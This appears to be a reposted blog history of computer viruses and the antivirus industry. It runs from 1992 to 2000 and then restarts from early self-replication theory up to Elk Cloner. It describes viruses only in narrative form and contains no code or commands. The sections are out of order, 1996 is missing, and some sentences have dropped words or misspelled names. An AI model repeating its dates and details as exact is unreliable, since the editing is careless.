The first anti-antivirus programs appeared during this year. Peach was one of the first: it deleted the database of Central Point AntiVirus's change inspector. If the antivirus program was unable to locate its database, then it acted as if it had been installed for the first time, recreating the database. In this way viruses avoided detection, and slowly infected the entire system.

Law enforcement agencies worldwide began developing departments specializing exclusively in computer crimes. For example, the Computer Crime Unit of The New Scotland Yard successfully disarmed the English virus group, ARCV (Association for Really Cruel Viruses). Great Britain's proactive law enforcement position practically neutralized computer underground activity and even now, we are unaware of any serious organized groups of virus-writers there.

In March of 1992, we witnessed the Michelangelo (or March6) outbreak and the media hype in advance (the virus itself was first detected in 1991, but caused an outbreak in 1992) Though some experts predicted that over 5 million machines would be infected, only a few thousand machines actually suffered.

The VCL and PS-MPC virus constructors first appeared in July 1992. They allowed people to create their own viruses by adding a range of malicious payloads to the constructors This increased the number and potentially destructive effect of viruses, as did MTE.

1992 also brought Win.Vir_1_4, the first virus for Windows. Win.Wir_1_4 infected operating system executable files Despite the fact that the virus was poorly coded, had limited propagation ability, and had no special Windows functionality, it nevertheless opened a new chapter in the history of computer viruses.

On the antivirus vendor front, Symantec bought Certus International along with their proprietary antivirus product, Novi.

1993-1995
1993
Virus writers began to take their work seriously. The computer underground had already mastered an array of new polymorphic generators and constructors, and founded new electronic publications. This year saw new viruses which employed new techniques to infect files, penetrate systems, destroy data and conceal themselves from antivirus applications.

One such example is the PMBS virus which worked in the secure regime of Intel 80386 processors. Another example was the Strange (or Hmm) virus, the only stealth virus, however, executed on the level of device interruption at INT 0Dh and INT76h.

Carbuncle signaled a new generation of companion viruses. A number of other viruses like Emmie, Bomber, Uruguay, and Cruncher employed fundamentally new techniques to conceal themselves in the code of infected files.

The spring of 1993 turned out to be a nerve-wracking time for many antivirus vendors: Microsoft released its own antivirus program. Microsoft AntiVirus (MSAV) was based on the former Central Point AntiVirus (CPAV). The program was included in the standard delivery of MS-DOS and Windows operating systems. The first tests conducted by independent testing laboratories showed a high level of effectiveness. However, later on, its quality began to slowly decline and the project was discontinued.

1994
More and more significance is attached to the problem of viruses on CDs. Having quickly become popular, this removable storage media became one of the primary ways of spreading viruses. Several incidents were registered when a virus was discovered on the master-disc of a compact disc producer. As a result, the computer market was flooded with relatively large shipments (tens of thousands) of infected discs. Naturally, such carriers could not be disinfected, they can only be destroyed.

At the beginning of the year, two extremely complex polymorphic viruses appeared in the UK: SMEG.Pathogen and SMEG.Queeg - even now, not all antivirus programs are able detect these programs with 100% certainty. The virus writer placed the infected files on BBS boards and caused both an outbreak and a panic in the mass media.

The GoodTimes hoax caused yet another panic. GoodTimes allegedly spread via the Internet and infected computers via email. However, sometime later, an ordinary DOS virus containing the text Good Times appeared and was named GT-Spoof.

Many other unusual viruses appear this year:

January: Shifter - the first virus to infect OBJ files.
Phantom1 becomes the first polymorphic virus in Moscow
April - ScrVir-a family of viruses which infects source code programs in C and Pascal.
June - OneHalf - a complex and dangerous polymorphic virus causes a significant outbreak: in fact, this virus is still active and can cause real damage to this day.
September - Zaraza - an MS-DOS file-loading virus caused a significant outbreak by using a unique installation method: the new technique temporarily stumped the antivirus experts.
This year also marked several significant developments in the antivirus field.

In June, one of the leading antivirus vendors was purchased by Symantec, who had already earned a reputation for aquiring other antivirus projects.

AntiViral Toolkit Pro was launched in September. Eugene Kaspersky's first product immediately won top marks in a series of independent tests conducted by Hamburg University.

1995
Nothing significant occurred in the field of DOS-viruses this year, although several complex virus such as Nightfall, Nostradamus, and Nutcracker appeared. There were also some interesting new viruses such as the 'bisexual' RMNS virus and the BAT virus, Winstart. There were also two widespread, but not severe outbreaks caused by ByWay and DieHard2.

In February, Microsoft sent infected versions of Windows 95 to beta-testers, but only one person thought to run an antivirus check. He discovered that the discs were infected by From and testing was put off until clean discs were issued.

In the Spring of 1995, two antivirus companies announced an alliance: ESaSS (the developer of ThunderBYTE Anti-Virus) and Norman Data Defense Systems (Norman Virus Control). These companies, both with their own very strong independent antivirus products, decided to combine efforts to develop a single antivirus system. Later on, in 1998, this alliance would crumble with a buy-out of the Dutch ESaSS by a Norwegian company.

In August, the Concept virus struck MS Windows: the virus circled the globe in only a month and was number one on antivirus vendors lists of most common viruses.

In the first half of September, one of the world's largest computer manufacturers, Digital Equipment Coporation (DEC) accidentally distributed copies of the Concept virus to delegates at a DECUS conference taking place in Dublin. Fortunately, the virus was quickly detected and the outbreak contained. Over a hundred known versions of the Concept virus are still in circulation today.

Green Stripe, a virus for AmiPro, a then popular word-processing program, also spread rapidly. The source code for Green Strip was published as a free supplement to Mark Ludwig's magazine Underground Technology Review.

The advent of macro viruses posed a new set of challenges for antivirus vendors. New technologies were needed to detect macro viruses; first in MS Word and eventually in other MS Office applications.

The English affiliate of the Ziff-Davis publishing house distinguished itself twice in 1995. The first time was in September when the publishing house's PC Magazine (English version) distributed a diskette containing the Sampo virus to its subscribers. This was soon discovered and the company offered its apologies and offered readers a free antivirus utility. The irony of the event lay in the fact that the diskette was a supplement for an issue which contained articles the results of antivirus tests for Novell NetWare products.

Later, in the middle of December, another Ziff-Davis publication, Computer Life, sent its readers a diskette containing a Christmas greeting. Unfortunately, it turned out that the diskette also contained the Parity Boot virus.

Law enforcement agencies also pressed onward in the struggle against cyber crime. On January 16, The New Scotland Yard's Computer Crime Unit took Christopher Pile to court for writing and distributing viruses. The unemployed Pile, or the Black Baron, as he was known in the underground was accused of authoring the Queeg and Pathogen viruses as well as the SMEG polymorphic generator. After ten months Pile pleaded guilty and was sentenced to 18 months in prison.

1997
In February of 1997, Linux Bliss, the first virus for the Linux operating system appeared. Viruses had moved to yet another environment. Although Linux viruses are a rarity, they have evolved since their first appearance. Viruses which run in the background have been developed for Linux, as well as a number of viable Trojans for this platform. If Linux were even half as popular asWindows obtained, the number of viruses for Linux would be far greater than the actual number of viruses which exist for this platform.The release of Microsoft's Office 97 was noteable for the fact that macro viruses almost immediately migrated towards this application. The limited payloads (or in some cases the total absence thereof) of macro viruses created for MS Word 5.0 and Excel 5.0 resulted from a completely new version of Visual Basic for Applications, VBA 5.0 which differed significantly from Word Basic and VBA 3.0. The first viruses for MS Office 97 turned out to be almost identical to their predecessors, simply converted into a new format. Nevertheless soon new macro viruses developed exclusively for MS Office 97 appeared.

March 1997 was notable for the appearance of the 'ShareFun' macro virus for MS Word 6/7 which started a new chapter in computer history It became the first virus of its kind to spread using email, in particular MS Mail.

In April of 1997 the Homer virus was detected; this was the first network worm which used FTP to propagate.June 1997 brought the first self_encrypting virus for Windows 95, Win95.Mad. The virus, of Russian origin, was sent out to several BBS stations in Moscow causing a major epidemic.The 'Esperanto' virus was born in November 1997. It was an attempt, fortunately unsuccessful, to create a multi-platform virus which would be able to infect DOS, Windows and MacOS.The development of the Internet, and in particular the appearance of mIRC (Internet Relay Chat) sparked a great deal of interest, including that of virus writers. It didn't take long for the malicious programs to start appearing.In December of 1997, the antivirus world publicized the appearance of a fundamentally new type of computer worm which spread via IRC channels. An analysis of mIRC, one of the more popular IRC utilities showed a dangerous security loophole. The directory for files downloaded via IRC coincided with the directory which held the SCRIPT:INI command file. The SCRIPT:INI file , which contained the body of the worm, could therefore be transferred to a remote computer, where it would automatically replace the original command file. When restarted, mIRC would activate the malicious code, and the worm would then send itself to other users. This error was quickly corrected and the rather primitive IRC worms had disappeared by summer. However, multi-component IRC worms which actively searched for SCRIPT.INI files (in mIRC clients), EVENTS.INI (in pIRCh) clients, and others. later appeared, working in a similar way to email worms; the user would receive anEXE, COM, BAT, file, which when launched, would replace the original command file.One of the more important events of 1997 was the split-off of one of the KAMI firm's divisions led by Evgenii Kaspersky. This division became an independent company known as 'Kaspersky Labs' which is, today, recommended as a recognized technical leader in the antivirus industry. Since 1994, the company's main product, AntiViral Toolkit Pro, consistently shows high results in numerous tests conducted by various testing laboratories across the world. The formation of an independent legal entity allowed a small group of developers to become, within two years, one of the its own country's domestic leaders in addition to being generally well-known internationally. Little time was required to develop and release versions with new antivirus security technologies for virtually all popular platforms, and create a network of international distribution and technical support.

In October 1997, Kaspersky Lab and Finnish company Data Fellows (later renamed as F-Secure Corporation) signed an agreement to licensing an antivirus engine in their newest development product, FSAV (F-Secure Anti-Virus). Prior to this, Data Fellows had been well-known as the developer of F-PROT antivirus.

1997 will also long be remembered as a year of petty squabbles. Several scandals evolved at the same time between some of the larger antivirus manufacturers. Atthe beginning of the year, McAfee announced that they had discovered a 'bookmark' in the programs of one of their main competitors, antivirus firm Dr. Solomon's. McAfee's announcement continued in saying that if Dr. Solomon's antivirus program discovered several viruses during a scan-check, then it completed its work in an elevated mode. In other words, if the program worked in a normal mode in normal conditions, then in testing for several viruses it switched to an intense mode (or in McAfee's words, a 'cheat mode') which allowed the detection of viruses previously invisible to Dr. Solomon's in normal scanning mode. As a result, the testing of uninfected discs showed good speed results and the scan tests of virus collections showed good detection results.

Dr. Solomon's response was not long in the waiting, and the company soon filed suit against McAfree's recent marketing campaign which claimed that McAfee was, 'The Number One Choice Worldwide. No Wonder The Doctor's Left Town'. This was an obvious reference to Alan Solomon, the founder of Dr. Solomon's who had in fact, earlier transferred control of his company to its senior management.

Perhaps even more scandalous was the affair of the Taiwanese developer Trend Micro who accused two of the leading antivirus companies, McAfee and Symantec, of violating its patent on virus scan-checking technology via Internet and electronic mail. Shortly afterward Symantec leapt into the fray with its own accusations, alleging that McAfee was guilty of using code from Symantec's Norton AntiVirus.

The year came to a close with MacAfee Associates and Network General announcing their intent to merge into a single Network Associates Inc (NAI) in order to diversify into other computer security systems as well (such as encryption, multi-networked screens, network scans, etc. However, at the end of 1999 NAI's management decides to bring new life into the McAfee brand and line of antivirus products and the company reverted to its old name.

1998
Virus attacks on MS Windows, MS Office and network applications continued apace, with viruses exploiting new infection vectors and using ever more complex technologies. A wide range of Trojan programs designed to steal passwords (PSW family) and remote adminstration utilities (Backdoor) appeared. Several computer magazines distributed discs which were infected with Windows viruses, CIH and Marburg. Specifically, compact discs attached to the English, Slovenian, Swiss and later Italian versions of PC Gamer contained the Marbug virus. This virus was contained in the electronic registration program of an MGM Interactive disc with the game, Wargames PC. At the end of September, the AutoStart virus was discovered on discs which were to be distributed with the Corel DRAW 8.1 for Mac OS.

The beginning of the year borught an epidemic caused by a whole family of viruses Win32.HLLP.DeTroi which not only infected Win32 EXE files, but were also capable of transmitting information about victim machines to the author of the virus. Because the virus exploited system libraries used only in the French version of Windows, the the epidemic affected only French-speaking countries.

In February, the Excel4Paix (or Formula.Paix) virus was detected, This new macro virus install itself in Excel tables by using an unusual macro area of formulas which were capable of containing self-replicating code. Later the same month, polymorphic Windows32 viruses emerged: Win95.HPS and Win95.Marburg. Further more, they were detected in the wild. Antivirus developers were forced to rapidly develop new methods of detection for polymorphic viruses which, until then, had been only for DOS.

AccesiV, the first virus for Microsoft Access, was detected in March. Unlike the earlier Word.Concept and Excel.Laroux viruses, it did not cause much alarm, as most users had come to accept that Microsoft applications are highly vulnerable. At approximately the same time, another virus called Cross surfaced This was the first multi-platform macro virus capable of infecting documents simultaneously in two Microsoft Office applications, Word and Access. On the heels of Cross several other macro-viruses materialized, transferring their code from one Office application to another. The most notable of these was Triplicate (also known as Tristate) which was capable of infecting Word, Excel and PowerPoint.

In May of 1998, the Red Team virus became the first virus to infect Windows EXE files and distribute itself using the Eudora email client. June brought the Win95.CIH virus, which caused an epidemic of mass and then later global proportions, infecting computer networks and home computers by the thousand. The beginning of the epidemic was pin-pointed to Taiwan where an unknown hacker sent infected files to a local electronic list-serve. From there the virus spread to the States where infected files made it onto several popular web-servers and spread the virus to gaming programs. It was most likely the game servers that acted as the primary reason for the large-scale epidemic, which continued throughout the year. The virus leap-frogged in 'popularity' over earlier virus superstars such as Word.CAP and Excel.Laroux. Most notable was the virus payload: depending on the day of infection, the virus would erase Flash BIOS, which in some cases could make it necessary to replace the motherboard. CIH's complex procedures caused antivirus products to significantly increase their speed of development.In August of 1998 the emergence of BackOrifice (or Backdoor.BO) caused controversy, it was designed to be a secret utility to be used for remote host administration across networks. Other similar viruses such as NetBus and Phase appeared shortly thereafter.

August also saw the emergence of the first malicious executable Java module, Java.StrangeBrew. This virus did not present a specific danger to Internet users, but it did illustrate the fact that viruses can also be found in applications actively used in viewing Web servers.

In November 1998, malicious programs continued to evolve hwith three viruses infecting the scripts of Visual Basic (VBS files) which were actively used in creating webpages. At the time, Kaspersky Labs released an in-depth study on the potential threat of VBS viruses. However, many specialists were too quick to label the company as a panic inciter and criticized the study for provoking virus hysteria. Half a year later when the LoveLetter epidemic broke, it became clear that Kaspersky's prognosis was completely accurate. To this day, this type of virus holds onto first place in the list of most widespread and dangerous virus types.

The logical culmination of VBScript viruses were full-fledged HTML viruses like HTML.Internal. It became patently clear that virus-writers' efforts are beginning to focus more and more on network applications. Virus writers were moving towards a networks worm which exploited flaws in MS Windows and Office and infectted remote computers through Web servers or via email.

The next MS Office application to fall victim to a virus was PowerPoint. In December 1998, a virus of unknown origins, Attach, was the first to attack. It was immediately followed by two more, ShapeShift and ShapeMaster, the author of which was likely one and the same. The appearance of PowerPoint viruses caused yet another headache for antivirus vendors. Files of this MS application use an OLE2 format which determines the way in which viruses can be scanned for in DOS and XLS files. However, the VBA modules in PPT format are stored in compressed format which meant that it was necessary to design new algorithms to decompress them and facilitate antivirus searches. Despite the complexity of what would seem like a simple task, almost all antivirus companies have integrated into their products the necessary functionality to defend against PowerPoint viruses.

In January, Virus Bulletin magazine began a new project: VB 100%. This regular testing of antivirus products is designed to determine whether the solutions can detect 100% of viruses from the wild. VB 100% is now regarded as one of the more respected independent testers.Significant changes occurred in the antivirus vendor market as well. In May, Symantec and IBM announced their unified efforts to develop an antivirus product. The combined product was to be distributed by Symantec under the same name, while IBM's product, IBM Anti-Virus would cease to exist. Towards the end of September, Symantec announced its purchase of the antivirus business from Intel Corporation, LANDesk Virus Protect. Just two weeks later, Symantec surprised the industry yet again with another purchase, this time of QuarterDeck for $65 million. The company's product range included such antivirus products as ViruSweep.

Such aggressive tactics did not go unnoticed by the American antivirus giant, NAI which on August 13th, announced its purchase of one of its primary competitors, English company, Dr. Solomon's. The latter was bought for the record amount of $640 million by means of a stock swap. These events evoked true shock in the antivirus industry. A previous conflict between two large players of the industry had ended in a buy-sell deal the result of which was the disappearance of one of the more noticeable and technologically strong developers of antivirus software.

Also interesting was the purchase of EliaShim, a developer of the antivirus product E-Safe. The purchase was made in December by Alladdin Knowledge Systems, a well-known developer of equipment and software for computer security.

A curious incident occurred with the publication of computer virus warning in the December 21st edition of The New York Times. The author warned users about the appearance of a virus which spread via email and was already being detected in some networks. It later became evident that this scary virus was none other than the already well-known macro virus, Class.

1999
Strange as it may seem, the most significant news to come out of this year was not the emergence of a new computer virus, but an announcement about the long-planned purchase of Australian antivirus vendor Cybec, by software giant, Computer Associates (CA). In was with that With this purchase, CA added another antivirus product to its collection, having purchased Cheyenne Software at the end of 1996. Both products still exist to this day: CA Vet Anti-Virus and CA InnoculateIT.

Viruses, however, did not sit idly by, and in January we witnessed the emergence of a global epidemic with the Happy99 virus (also known as Ska). This was actually the first modern-day worm, which once again opened a new chapter in the history of malware evolution. It used MS Outlook, which had become a corporate standard in Europe and the US to spread. Despite the fact that Happy99 first appeared at the beginning of 1999, it still regularly shows up as one of the top ten most widespread harmful programs to this day.

At almost the same time, a very interesting macrovirus for MS Word was detected: Caligula. It searched the system registry, forkeys corresponding to PGP (Pretty Good Privacy) programs and searched for the appropriate databases. If such databases were found, the virus initiated an FTP-Session and secretly sent files to a remote server.At the end of February. SK; the first virus which infected files using Windows HLP files.On the 26th of March, a global epidemic was caused by Melissa, the first macro virus for MS Word combining Internet worm functionality as well. Immediately after infection, Melissa scanned the address book in MS Outlook and sent copies of itself to the first 50 found addresses. Like Happy99, Melissa did this without the knowledge or consent of the user, but messages still seemed to be in the user's name. Fortunately, this macro virus was not complex and antivirus developers quickly released the necessary additions to their databases. The epidemic was contained quickly. Despite this, Melissa still managed to inflict significant damage on a range of computer systems:industry giants like Microsoft, Intel and Lockheed Martin were forced to temporarily shut down their corporate email systems. Estimates placethe damage caused by the virus at several tens of millions of US dollars.

Law enforcement agencies in the US (or, cybercrime units, to be more precise) reacted exceptionally quickly to the Melissa virus. A short while thereafter, the author of the virus was discovered and arrested. He was 31 year old David L. Smith, a programmer from New Jersey. On December 9th, he was found guilty and sentenced to 10 years in prison and fined $400,000.

Law enforcement agencies were equally active on the other side of the Pacific ocean as well. In Taiwan, the author of the CIH virus, earlier known only as Chernobyl, was exposed as Chen Ing Hao (notice the initials), a student at the Taiwan Technical Institute. However, due to a lack of charges from any of the local companies, the police had no basis for an arrest.

On May 7th, a virus intruded on the Canadian company, Corel. Under threat was its cash cow, Corel DRAW. The Gala virus (also known as GaLaDRieL) was written in Corel SCRIPT language and became the first virus capable of infecting Corel DRAW files as well as Corel PHOTO-PAINT and Corel VENTURA.

Another epidemic broke at the very beginning of the summer with the dangerous Internet worm, ZippedFiles (also known as ExploreZip). The virus came in the form of an EXE file, which once installated would destroy files of some of the more popular applications. While the worm was not as widespread as Melissa, the damage incurred was estimated to be several times higher. Despite a quick reaction from antivirus companies in neutralizing the virus, a relapse was recorded in December. The modified version was changed so that the body of the virus was compressed using the Neolite compression utility. If the antivirus program didn't recognize this compression format then the worm escaped unnoticed. At the time, none of the antivirus programs recognized this format. It was only in June of 2000 that AntiViral Toolkit Pro (AVP) was integrated with file-support for Neolite.

In August, an Internet worm named Toadie (or Termite) was detected. In addition to infecting files in DOS or Windows, the virus attached copies of itself to emails sent via Pegasus and attempted to spread through IRC channels.

October brought the computer industry three new surprises. First was the discovery of the Infis virus which was the first virus for this operating system, installing itself at the highest levels of platform security and affecting system drivers. This made the virus difficult to contain. The second surprise consisted of antivirus companies warning users about the first computer virus for MS Project. In actuality, this was a multiplatform virus that infected files of MS Word just as well as Ms Project. The third surprise was the emergence in July of yet another script virus, Freelinks was one of the predecessors of the well-known LoveLetter virus.

In November, the world was shaken by the emergence of a new generation of worms which spread via email without attached files and penetrated computers when infected messages were read. The first of these was Bubbleboy which was immediately followed by KakWorm. Viruses of this type exploited an Internet Explorer loophole, and although Microsoft issued a patch the same month, KakWorm remained widespread for a long time.That same month, the USA and Europe recorded several incidents of infection by FunLove, a Windows virus.

December 7th was noteable for the detection of the latest of a long line of Trojans authored by a Brazilian virus writer known as Vecna. The very dangerous and complex Babylonia virus turned a new page in the history of virus creation. It was the first worm which was capable of remote self-rejuvenation. Every minute it would connect to a server in Japan and download a list of virus modules. If it found viruses there fresher than on the infected computer, then it immediately downloaded them. Later, this same technique would be employed by Sonic, Hybris, and other viruses.

In the middle of the year, the antivirus industry officially divided into two camps in regard to their approach to potential Y2K threats. One camp strongly promoted the belief that the computer underground had prepared a surprise in the form of several hundred thousand viruses capable of shaking human civilization to its core. The subtext of this warning was clear: install antivirus software and you would be saved from attack. The second camp of antivirus companies logically opposed the first and attempted to maintain calm among scared users. Later, the warnings were proved baseless, and the year 2000 came in in the same way as any other year.A few curious stories were abroad as well. A compact disc distributed with the November edition of the Hungarian magazine, Uj Alaplap, contained, in addition to useful information, a distinctly unpleasant surprise: two macro viruses for MS Word, Class.B and Opey.A.

2000
The year began unexpectedly for users of Windows 2000 and Visio, a popular application for creating diagrams and flow-charts. Microsoft had not even finished announcing the release of a fully functional commercial version of their operating system when members of the underground group 29A set Inta loose. The virus was the first to infect Windows 2000 files Shortly after, two viruses emerged almost simultaneously, Unstable and Radiant which marked Visio's demise. The second incident brought to light a sick joke: the viruses had been released by Microsoft which not long after Unstable and Radiant purchased Visio Corporation.

In April, the first macro virus of Russian origin for MS Word was recorded. Proverb was detected in 10 Downing Street, the office of the British prime minister. It can only be hoped that English authorities heeded the advice of the Russian proverb, 'Don't put off 'till tomorrow what you can drink today'.

May 5th broke a record in the Guiness Book of Records with the script virus LoveLetter. Everything occurred exactly as Eugene Kaspersky had predicted in November of 1998. Naïve users couldn't even imagine that harmless VBS files and TXT files could contain a harmful virus. Once loaded, it destroyed a range of files and sent itself to all addresses in the MS Outlook address book. The transparency of the source code more or less guaranteed that new modifications of the virus would appear throughout the year, and currently, there are more than 90 of them in circulation.

On the 6th of June, the Timofonica virus was detectedö this was the first computer virus that employed, in a limited manner, mobile phones. In addition to spreading via email, the virus sent messages to random mobile phone numbers in the MoviStar cellular network, which belonged to the global telecommunications giant, Telefonica. The virus had no other effect on mobile phones despite the fact that many mass media outlets were quick to name Timifonica the first 'cellular' virus.

The summer of 2000 was hot, particularly as far as mobile phone viruses were concerned. While this period is usually a vacation time for virus writers and antivirus experts alike, the former, by all accounts, decided to surprise the latter. In July, a group known as the Cult of Death Cow produced a new version of Back Orifice virus (BO2K). This occurred at the annual DefCon conference (in a jab at Microsoft's DevCon) and evoked a flood of messages from frightened users to antivirus vendors. In reality, the new version posed little harm more than its predecessor and was promptly added to leading antivirus vendors' databases. The distinguishing feature of BO2K was its drift towards legitimate commercial utilities of remote administration; the program was visible upon installation. Despite this it could still be used for illicit purposes and was classified by antivirus companies as a BackdoorTrojan.

July saw the appearance of three exceptionally interesting viruses. Star was the first virus designed for AutoCAD packages. Dilber was distinguished by the fact that it containedcode from five other viruses including CIH, SK, and Bolzano. Depending on the date, Dilber activated processes from one of its components, earning it the nickname, Shuttle Virus. The third interesting virus was an Internet worm called Jer which employed a relatively clumsy means of penetrating computers. Script programs (the worm's body) were uploaded to a website which were automatically activated when the corresponding HTML page was opened. After this, users received a warning that an unidentified file was found on the disc. It was a calculated risk assuming human error: it was hoped that users would inadvertantly answer 'yes' to be rid of the script program. The appearance of this worm confirmed a new fashion in the spread of viruses through the Internet. First, the worm is placed on a website, and then a mass marketing campaign is conducted to attract users. The calculated risk paid off: for every thousand users, a few dozen would let the virus in.

In August, the Liberty virus was discovered - the first harmful Trojan program to affect the PalmOS operating systems of Palm Pilot. Upon installation, it deleted files but was incapable of replicating. In September, this new class of harmful programs was extended with the first true virus for PalmOS, Phage. It represented a classic virus-parasite program which after installing and infecting files proceeded to delete them and record its own code.

In the beginning of September, a computer virus by the name of Stream was discovered which was capable of manipulating the ADS of NTFS file systems. This virus posed no particular threat. More dangerous was the technology of accessing ADS insofar as no antivirus program was capable of scanning this location. Unfortunately, the virus evoked an insufficient reaction among some large antivirus firms which accused Kaspersky Lab of scaremongering. Despite the accusations, none of the opponents were able to offer any concrete arguments confirming the position they put forth regarding the safety of ADS in NTFS. The problem of antivirus protection for NTFS remains to this day a vital issue insofar as only a few antivirus scans have learned to search for viruses in ADS.

October saw the appearance of the first virus for PIF files (Fable), and the first virus written in PHP script-language (Pirus). Both viruses to this day have yet to be discovered 'in the wild'. At the same time, a scandal arose when Microsoft's internal systems were hacked and left open for several months by a group of unknown hackers from St. Petersburg. The entry was gained through a simple loophole using a network worm called QAZ. What was curious about this incident was the fact that at the time the system hack was discovered, the worm in question was already included in practically all antivirus databases. This caused some misgivings about the competency of Microsoft personnel, or, perhaps, their malicious intent. In any case, as of the writing of this book, the guilty parties have yet to be located.

A notable event occurs in November. Kaspersky Labs, having become one of the antivirus industry's major players in three short years, changes the name of its flagship product. AntiViral Toolkit Pro (AVP) becomes Kaspersky Anti-Virus and takes on a new logotype.

This same month brought the detection of a technologically complex and dangerous virus called Hybris. This virus was written by the Brazilian virus writer Vecna. He further developed his first self-rejuvenating virus, Babylonia taking into account earlier errors. The main innovation was the use of websites and list servers (alt.comp.virus in particular) to load new modules of the virus to infected computers. If it was easy to simply take a website down, then list servers were an ideal alternative for spreading as they were less easy to take down. Further, Hybris employed a 128-bit RSA key for identifying modules actually written by the author.

As a whole, 2000 was the year that email again proved itself to be the best way to transmit viruses. According to Kaspersky Labs' support statistics, approximately 85% of all registered infection occurred via email. The year was also notable for a wave of activity among virus creators with Linux. Altogether, there were37 registered new viruses and Trojan programs created for the Linux operating system. Consequently, the overall quantity of Linux viruses reached 43, which represented a seven-fold growth in 2000 alone. Finally, a change in the most widespread viruses occurred. Up until this year, macro viruses had been the most common, but once 2000 was over, this place was taken by script viruses.

Malicious De History

2008-06-07T09:49:00.000-07:00

History of Malicious Programs
Malicious software may seem like a relatively new concept. The epidemics of the past few years have introduced the majority of computer users to viruses, worms and Trojans - usually because their computers were attacked. The media has also played a role, reporting more and more frequently on the latest cyber threats and virus writer arrests.

However, malicious software is not really new. Although the first computers were not attacked by viruses, this does not mean they were not potentially vulnerable. It was simply that when information technology was in its infancy, not enough people understood computer systems to exploit them.

But once computers became slightly more common, the problems started. Viruses started appearing on dedicated networks such as the ARPANET in the 1970s. The boom in personal computers, initiated by Apple in the early 1980s, led to a corresponding boom in viruses. As more and more people gained hands-on access to computers, they were able to learn how the machines worked. And some individuals inevitably used their knowledge with malicious intent.

As technology has evolved, so have viruses. In the space of a couple of decades, we have seen computers change almost beyond recognition. The extremely limited machines which booted from a floppy disk are now powerful systems that can send huge volumes of data almost instantaneously, route email to hundreds or thousands of addresses, and entertain individuals with movies, music and interactive Web sites. And virus writers have kept pace with these changes.

While the viruses of the 1980s targeted a variety of operating systems and networks, most viruses today are written to exploit vulnerabilities in the most commonly used software: Microsoft Windows. The increasing number of vulnerable users is now being actively exploited by virus writers. The first malicious programs may have shocked users, by causing computers to behave in unexpected ways. However, the viruses which started appearing in the 1990s present much more of a threat: they are often used to steal confidential information such as bank account details and passwords.

So malicious software has turned into big business. An understanding of contemporary threats is vital for safe computing. This section gives an overview of the evolution of malware: it offers a glimpse of some historical curiosities, and provides a framework to help understand the origins of today's cyber-threats.

Historians are still debating when the first computer virus really appeared. We do know a few things for certain, however: the first computer, which is generally considered to have been invented by Charles Babbadge, did not have any viruses. By the mid-1970s, Univax 1108 and IBM 360/370 did.

Nevertheless, the idea for computer viruses actually appeared much earlier. Many consider the starting point to be the work of John von Neumann in his studies on self-reproducing mathematical automata, famous in the 1940s. By 1951, Neumann had already proposed methods for demonstrating how to create such automata.

In 1959, the British mathematician Lionel Penrose presented his view on automated self-replication in his Scientific American article 'Self-Reproducing Machines'. Unlike Neumann, Penrose described a simple two dimensional model of this structure which could be activated, multiply, mutate and attack. Shortly after Penrose's article appeared, Frederick G. Stahl reproduced this model in machine code on an IBM 650.

It should be noted that these studies were never intended to providing a basis for the future development of computer viruses. On the contrary, these scientists were striving to perfect this world and make it more suitable for human life. And it was these works that laid the foundation for many later studies on robotics and artificial intelligence.

In 1962, a group of engineers from America's Bell Telephone Laboratories, V. Vyssotsky, G. McIlroy, and Robert Morris, created a game called 'Darwin.' The game consisted of a so-called umpire in the memory of the computer that determined the rules and order of battle between competing programs created by the players. The programs could track and destroy opponents' programs and, more importantly, multiply. The point of the game was to delete your opponent's programs and gain control over the battle field.

The theoretical suppositions of scientists' and the engineers' harmless game were shadowed by the moment when the world realized that the theory of self-multiplying units could be used, equally successfully, for completely different purposes.

1970s
Sometime in the early 1970s, the Creeper virus was detected on ARPANET, a US military computer network which was the forerunner of the modern Internet. Written for the then-popular Tenex operating system, this program was able to gain access independently through a modem and copy itself to the remote system. Infected systems displayed the message, 'I'M THE CREEPER : CATCH ME IF YOU CAN.'

Shortly thereafter, the Reaper program was anonymously created to delete Creeper. Reaper was a virus: it spread to networked machines and if it located a Creeper virus, Reaper would delete it. Even the participants are unable to say whether Reaper was a response to Creeper, or if it was created by the same person or persons who created Creeper in order to correct their mistake.

1974
A virus dubbed Rabbit appeared: it was called Rabbit because it didn't do anything except multiply and spread to other machines. The name was a comment on the speed with which the program multiplied. It clogged the system with copies of itself, impairing system performance. Once Rabbit multiplied to a certain level on an infected machine, the virus would crash.

1975
Pervading Animal, another game, this time written for a Univac 1108, appeared in 1975. To this day, analysts argue about whether this was another virus or the first Trojan.

The rules of the game were simple: the player would think of an animal and the program asked questions in an attempt to identify it. The game was equipped with a self-correction function; if the program was unable to guess the animal, it would update itself and enter new questions. The new modernized version overwrote the old version but, in addition to this, copied itself to other directories. After some time, as a result, all directories would contain copies of 'Pervading Animal.' It is unlikely that engineers appreciated this because the combined volume of the game's copies occupied a significant amount of disc space.

Was this simply a mistake by the game's creator or a conscious attempt to clutter up the system? It is difficult to say. The boundary between programs functioning incorrectly and malicious code was unclear in those days.

Univac programmers attempted to use the Creeper-Reaper model to control Pervading Animal: a new version of the game scanned for older versions and destroyed them. However, the issue was resolved fully only when Exec 8, a new version of the operating system, was released. The file system was modified and the game was unable to multiply.

Early 1980s
As computers gained in popularity, more and more individuals started writing their own programs. Advances in telecommunications provided convenient channels for sharing programs through open-access servers such as BBS - the Bulletin Board System. Eventually university BBS servers evolved into a global data bank and were available in all developed countries. The first Trojans appeared in large quantities; programs that couldn't self-replicate or spread, but did damage systems once downloaded and installed.

1981
The widespread use of Apple II computers predetermined this machine's fate in attracting the attention of virus writers. It is not surprising that the first large-scale computer virus outbreak in history occurred on the Apple II platform.

Elk Cloner spread by infecting the Apple II's operating system, stored on floppy disks. When the computer was booted from an infected floppy, a copy of the virus would automatically start. The virus would not normally affect the running of the computer, except for monitoring disk access. When an uninfected floppy was accessed, the virus would copy itself to the disk, thus infecting it, too, slowly spreading from floppy to floppy.

The Elk Cloner virus infected the boot sector for Apple II computers. In those days, operating systems were stored on floppy disks: as a result the floppies were infected and the virus was launched every time the machine was booted up. Users were startled by the side effects and often infected friends by sharing floppies, since most people had no idea what viruses were, much less how they spread.

The Elk Cloner payload included rotating images, blinking text and joke messages:

ELK CLONER:
THE PROGRAM WITH A PERSONALITY
IT WILL GET ON ALL YOUR DISKS
IT WILL INFILTRATE YOUR CHIPS
YES, IT'S CLONER
IT WILL STICK TO YOU LIKE GLUE
IT WILL MODIFY RAM, TOO
SEND IN THE CLONER!
1983
